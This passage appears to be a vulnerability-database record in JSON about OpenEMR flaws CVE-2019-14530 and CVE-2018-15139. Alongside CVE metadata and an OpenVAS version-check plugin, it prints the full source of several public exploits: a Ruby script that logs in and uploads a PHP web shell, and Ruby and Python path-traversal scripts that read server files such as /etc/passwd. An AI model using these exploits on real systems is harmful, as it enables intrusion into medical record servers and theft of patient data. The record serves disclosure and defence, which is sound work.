"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-13T00:00:00", "type": "zdt", "title": "OpenEMR 5.0.1.3 - (manage_site_files) Remote Code Execution (Authenticated) Exploit (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": 
"2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15139", "CVE-2019-14530"], "modified": "2021-07-13T00:00:00", "id": "1337DAY-ID-36549", "href": "https://0day.today/exploit/description/36549", "sourceData": "# Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)\n# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr)\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz\n# Docker PoC: https://github.com/sec-it/exploit-CVE-2018-15139/blob/master/docker-compose.yml\n# Version: < 5.0.1.4 (it means up to 5.0.1.3)\n# Tested on: OpenEMR Version 5.0.0.8\n# References: https://www.exploit-db.com/exploits/49998\n# CVE: CVE-2018-15139\n# CWE: CWE-434\n# Patch: https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485\n\n#!/usr/bin/env ruby\n\nrequire 'pathname'\nrequire 'httpx'\nrequire 'http/form_data'\nrequire 'docopt'\n\ndoc = <<~DOCOPT\n OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution\n\n Source: https://github.com/sec-it/exploit-CVE-2019-14530\n\n Usage:\n #{__FILE__} exploit <url> <filename> <username> <password> [--debug]\n #{__FILE__} -h | --help\n\n Options:\n <url> Root URL (base path) including HTTP scheme, port and root folder\n <filename> Filename of the shell to be uploaded\n <username> Username of the admin\n <password> Password of the admin\n --debug Display arguments\n -h, --help Show this screen\n\n Examples:\n #{__FILE__} exploit http://example.org/openemr shell.php admin pass\n #{__FILE__} exploit https://example.org:5000/ shell.php admin pass\nDOCOPT\n\ndef login(root_url, user, pass, http)\n vuln_url = \"#{root_url}/interface/main/main_screen.php?auth=login&site=default\"\n params = {\n 'new_login_session_management' => '1',\n 'authProvider' => 'Default',\n 'authUser' => user,\n 
'clearPass' => pass,\n 'languageChoice' => '1'\n }\n\n http.post(vuln_url, form: params).body.to_s\nend\n\ndef upload(root_url, filepath, http)\n vuln_url = \"#{root_url}/interface/super/manage_site_files.php\"\n pn = Pathname.new(filepath)\n\n params = {\n form_image: {\n content_type: 'application/x-php',\n filename: pn.basename.to_s,\n body: pn\n },\n bn_save: 'Save'\n }\n\n res = http.post(vuln_url, form: params)\n\n return '[-] File not upload' unless (200..299).include?(res.status)\n\n \"[+] File uploaded:\\n#{root_url}/sites/default/images/#{pn.basename}\"\nend\n\nbegin\n args = Docopt.docopt(doc)\n pp args if args['--debug']\n\n if args['exploit']\n http = HTTPX.plugin(:cookies).plugin(:follow_redirects).plugin(:multipart)\n login(args['<url>'], args['<username>'], args['<password>'], http)\n puts upload(args['<url>'], args['<filename>'], http)\n end\nrescue Docopt::Exit => e\n puts e.message\nend\n", "sourceHref": "https://0day.today/exploit/36549", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-06-05T14:19:49", "description": "An issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter. An attacker can download any file (that is readable by the user www-data) from server storage. 
If the requested file is writable for the www-data user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-13T14:15:00", "type": "cve", "title": "CVE-2019-14530", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14530"], "modified": "2022-02-10T15:26:00", "cpe": [], "id": "CVE-2019-14530", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-14530", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cpe23": []}], "exploitdb": [{"lastseen": "2023-06-05T14:52:36", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-05T00:00:00", "type": 
"exploitdb", "title": "OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14530"], "modified": "2021-07-05T00:00:00", "id": "EDB-ID:50087", "href": "https://www.exploit-db.com/exploits/50087", "sourceData": "# Title: OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2)\n# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr)\n# Exploit source: https://github.com/sec-it/exploit-CVE-2019-14530\n# Date: 2021-06-24\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_7.tar.gz\n# Docker PoC: https://github.com/sec-it/exploit-CVE-2019-14530/blob/master/docker-compose.yml\n# Version: < 5.0.2 (it means up to 5.0.1.7)\n# Tested on: OpenEMR Version 5.0.1\n# References: https://www.exploit-db.com/exploits/50037\n# CVE: CVE-2019-14530\n# CWE: CWE-22\n# Patch: https://github.com/openemr/openemr/pull/2592/files\n\n#!/usr/bin/env ruby\n\nrequire 'pathname'\nrequire 'httpx'\nrequire 'docopt'\n\ndoc = <<~DOCOPT\n OpenEMR < 5.0.2 - (Authenticated) Path Traversal - Local File Disclosure\n\n Source: https://github.com/sec-it/exploit-CVE-2019-14530\n\n Usage:\n #{__FILE__} exploit <url> <filename> <username> <password> [--debug]\n #{__FILE__} -h | --help\n\n Options:\n <url> Root URL (base path) including HTTP scheme, port and root folder\n <filename> Filename of the file to be read\n <username> Username of the admin\n <password> Password 
of the admin\n --debug Display arguments\n -h, --help Show this screen\n\n Examples:\n #{__FILE__} exploit http://example.org/openemr /etc/passwd admin pass\n #{__FILE__} exploit https://example.org:5000/ /etc/passwd admin pass\nDOCOPT\n\ndef login(root_url, user, pass, http)\n vuln_url = \"#{root_url}/interface/main/main_screen.php?auth=login&site=default\"\n params = {\n 'new_login_session_management' => '1',\n 'authProvider' => 'Default',\n 'authUser' => user,\n 'clearPass' => pass,\n 'languageChoice' => '1'\n }\n\n http.post(vuln_url, form: params).body.to_s\nend\n\ndef exploit(root_url, filename, http)\n vuln_url = \"#{root_url}/custom/ajax_download.php?fileName=../../../../../../../../../#{filename}\"\n\n http.get(vuln_url).body.to_s\nend\n\nbegin\n args = Docopt.docopt(doc)\n pp args if args['--debug']\n\n if args['exploit']\n http = HTTPX.plugin(:cookies).plugin(:follow_redirects)\n login(args['<url>'], args['<username>'], args['<password>'], http)\n puts exploit(args['<url>'], args['<filename>'], http)\n end\nrescue Docopt::Exit => e\n puts e.message\nend", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/php/webapps/50087.rb", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-05T14:52:42", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-21T00:00:00", "type": "exploitdb", "title": "OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": 
false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-14530", "CVE-2019-14530"], "modified": "2021-06-21T00:00:00", "id": "EDB-ID:50037", "href": "https://www.exploit-db.com/exploits/50037", "sourceData": "# Exploit Title: OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated)\n# Date 16.06.2021\n# Exploit Author: Ron Jost (Hacker5preme)\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_7.zip\n# Version: All versions prior to 5.0.2\n# Tested on: Ubuntu 18.04\n# CVE: CVE-2019-14530\n# CWE: CWE-22\n# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/CVE-2019-14530-Exploit/README.md\n# Reference: https://raw.githubusercontent.com/Wezery/CVE-2019-14530/master/Path%20traversal%20and%20DoS.pdf\n\n'''\nDescription:\nAn issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter.\nAn authenticated attacker can download any file (that is readable by the user www-data)\nfrom server storage. 
If the requested file is writable for the www-data user and the directory\n/var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server.\n'''\n\n\n'''\nBanner:\n'''\nbanner = \"\"\"\n\n\n ______ _______ ____ ___ _ ___ _ _ _ ____ _____ ___\n / ___\\ \\ / / ____| |___ \\ / _ \\/ |/ _ \\ / | || || ___|___ / / _ \\\n| | \\ \\ / /| _| _____ __) | | | | | (_) |_____| | || ||___ \\ |_ \\| | | |\n| |___ \\ V / | |__|_____/ __/| |_| | |\\__, |_____| |__ _|__) |__) | |_| |\n \\____| \\_/ |_____| |_____|\\___/|_| /_/ |_| |_||____/____/ \\___/\n\n by Hacker5preme\n\n\"\"\"\nprint(banner)\n\n\n'''\nImport required modules:\n'''\nimport requests\nimport argparse\n\n\n'''\nUser-Input:\n'''\nmy_parser = argparse.ArgumentParser(description='OpenEMR Path Traversal')\nmy_parser.add_argument('-T', '--IP', type=str)\nmy_parser.add_argument('-P', '--PORT', type=str)\nmy_parser.add_argument('-U', '--PATH', type=str)\nmy_parser.add_argument('-u', '--USERNAME', type=str)\nmy_parser.add_argument('-p', '--PASSWORD', type=str)\nargs = my_parser.parse_args()\ntarget_ip = args.IP\ntarget_port = args.PORT\nopenemr_path = args.PATH\nusername = args.USERNAME\npassword = args.PASSWORD\nprint('')\nFilepath = input('[+] Filepath: ')\n\n\n'''\nAuthentication:\n'''\nsession = requests.Session()\nauth_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/main/main_screen.php?auth=login&site=default'\n\n# Header:\nheader = {\n 'Host': target_ip,\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',\n 'Accept-Encoding': 'gzip, deflate',\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Origin': 'http://' + target_ip,\n 'Connection': 'close',\n 'Upgrade-Insecure-Requests': '1'\n}\n\n# Body:\nbody = {\n 'new_login_session_management': '1',\n 'authProvider': 'Default',\n 
'authUser': username,\n 'clearPass': password,\n 'languageChoice': '1'\n}\n\n# Authenticate:\nprint('')\nauth = session.post(auth_url, headers=header, data=body)\nif 'error=1&site=' in auth.text:\n print('[-] Authentication failed')\n exit()\nelse:\n print('[+] Authentication successfull: ' + str(auth))\n\n\n'''\nPath Traversal:\n'''\nurl_static = 'http://' + target_ip + ':' + target_port + openemr_path\nurl_dynamic = '/custom/ajax_download.php?fileName=../../../../../../../../..'\nurl_exploit = url_static + url_dynamic + Filepath\nprint('')\nprint('[+] Constructed malicious URL: ')\n\n# Headers:\nheader = {\n 'Host': target_ip,\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',\n 'Accept-Encoding': 'gzip, deflate',\n 'Connection': 'close',\n 'Upgrade-Insecure-Requests': '1'\n}\n\n# Exploit:\nprint('')\nprint('[+] Contents of ' + Filepath + ':')\nprint('')\ngetfile = session.get(url_exploit, headers = header)\nprint(getfile.text)", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/php/webapps/50037.py", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-05T18:25:31", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T00:00:00", "type": "exploitdb", "title": "OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", 
"exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2018-15139", "CVE-2018-15139", "CVE-2019-14530"], "modified": "2021-07-13T00:00:00", "id": "EDB-ID:50122", "href": "https://www.exploit-db.com/exploits/50122", "sourceData": "# Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)\n# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr)\n# Date: 2021-07-05\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz\n# Docker PoC: https://github.com/sec-it/exploit-CVE-2018-15139/blob/master/docker-compose.yml\n# Version: < 5.0.1.4 (it means up to 5.0.1.3)\n# Tested on: OpenEMR Version 5.0.0.8\n# References: https://www.exploit-db.com/exploits/49998\n# CVE: CVE-2018-15139\n# CWE: CWE-434\n# Patch: https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485\n\n#!/usr/bin/env ruby\n\nrequire 'pathname'\nrequire 'httpx'\nrequire 'http/form_data'\nrequire 'docopt'\n\ndoc = <<~DOCOPT\n OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution\n\n Source: https://github.com/sec-it/exploit-CVE-2019-14530\n\n Usage:\n #{__FILE__} exploit <url> <filename> <username> <password> [--debug]\n #{__FILE__} -h | --help\n\n Options:\n <url> Root URL (base path) including HTTP scheme, port and root folder\n <filename> Filename of the shell to be uploaded\n <username> Username of the admin\n <password> Password of the admin\n --debug Display arguments\n -h, --help Show this screen\n\n Examples:\n #{__FILE__} exploit 
http://example.org/openemr shell.php admin pass\n #{__FILE__} exploit https://example.org:5000/ shell.php admin pass\nDOCOPT\n\ndef login(root_url, user, pass, http)\n vuln_url = \"#{root_url}/interface/main/main_screen.php?auth=login&site=default\"\n params = {\n 'new_login_session_management' => '1',\n 'authProvider' => 'Default',\n 'authUser' => user,\n 'clearPass' => pass,\n 'languageChoice' => '1'\n }\n\n http.post(vuln_url, form: params).body.to_s\nend\n\ndef upload(root_url, filepath, http)\n vuln_url = \"#{root_url}/interface/super/manage_site_files.php\"\n pn = Pathname.new(filepath)\n\n params = {\n form_image: {\n content_type: 'application/x-php',\n filename: pn.basename.to_s,\n body: pn\n },\n bn_save: 'Save'\n }\n\n res = http.post(vuln_url, form: params)\n\n return '[-] File not upload' unless (200..299).include?(res.status)\n\n \"[+] File uploaded:\\n#{root_url}/sites/default/images/#{pn.basename}\"\nend\n\nbegin\n args = Docopt.docopt(doc)\n pp args if args['--debug']\n\n if args['exploit']\n http = HTTPX.plugin(:cookies).plugin(:follow_redirects).plugin(:multipart)\n login(args['<url>'], args['<username>'], args['<password>'], http)\n puts upload(args['<url>'], args['<filename>'], http)\n end\nrescue Docopt::Exit => e\n puts e.message\nend", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/php/webapps/50122.rb", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-09-24T14:26:54", "description": "OpenEMR is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2019-08-06T00:00:00", "type": "openvas", "title": "OpenEMR < 5.0.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-3963", "CVE-2019-3966", "CVE-2019-3968", "CVE-2019-14530", "CVE-2019-3965", "CVE-2019-14529", "CVE-2019-8371", "CVE-2019-3967", "CVE-2019-3964", "CVE-2019-8368"], "modified": "2019-09-24T00:00:00", "id": "OPENVAS:1361412562310142700", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310142700", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:open-emr:openemr\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.142700\");\n script_version(\"2019-09-24T06:52:30+0000\");\n script_tag(name:\"last_modification\", value:\"2019-09-24 06:52:30 +0000 (Tue, 24 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-08-06 09:13:00 +0000 (Tue, 06 Aug 2019)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2019-14529\", \"CVE-2019-14530\", \"CVE-2019-3963\", \"CVE-2019-3964\", \"CVE-2019-3965\",\n \"CVE-2019-3966\", \"CVE-2019-3967\", \"CVE-2019-3968\", \"CVE-2019-8368\", \"CVE-2019-8371\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"OpenEMR < 5.0.2 Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_openemr_detect.nasl\");\n 
script_mandatory_keys(\"openemr/installed\");\n\n script_tag(name:\"summary\", value:\"OpenEMR is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"insight\", value:\"OpenEMR is prone to multiple vulnerabilities:\n\n - SQL injection vulnerability in interface/forms/eye_mag/save.php (CVE-2019-14529)\n\n - Authenticated file download vulnerability (CVE-2019-14530)\n\n - Multiple XSS vulnerabilities (CVE-2019-3963, CVE-2019-3964, CVE-2019-3965, CVE-2019-3966, CVE-2019-8368)\n\n - Directory Traversal and Arbitrary File Download vulnerability (CVE-2019-3967)\n\n - Multiple command injection vulnerabilities (CVE-2019-3968, CVE-2019-8371)\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"OpenEMR versions prior to 5.0.2.\");\n\n script_tag(name:\"solution\", value:\"Update to version 5.0.2 or later.\");\n\n script_xref(name:\"URL\", value:\"https://github.com/openemr/openemr/pull/2592\");\n script_xref(name:\"URL\", value:\"https://github.com/Wezery/CVE-2019-14530\");\n script_xref(name:\"URL\", value:\"https://www.tenable.com/security/research/tra-2019-40\");\n script_xref(name:\"URL\", value:\"https://know.bishopfox.com/advisories/openemr-5-0-16-remote-code-execution-cross-site-scripting\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, exit_no_version: TRUE))\n exit(0);\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nif (version_is_less(version: version, test_version: \"5.0.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"5.0.2\", install_path: location);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}]}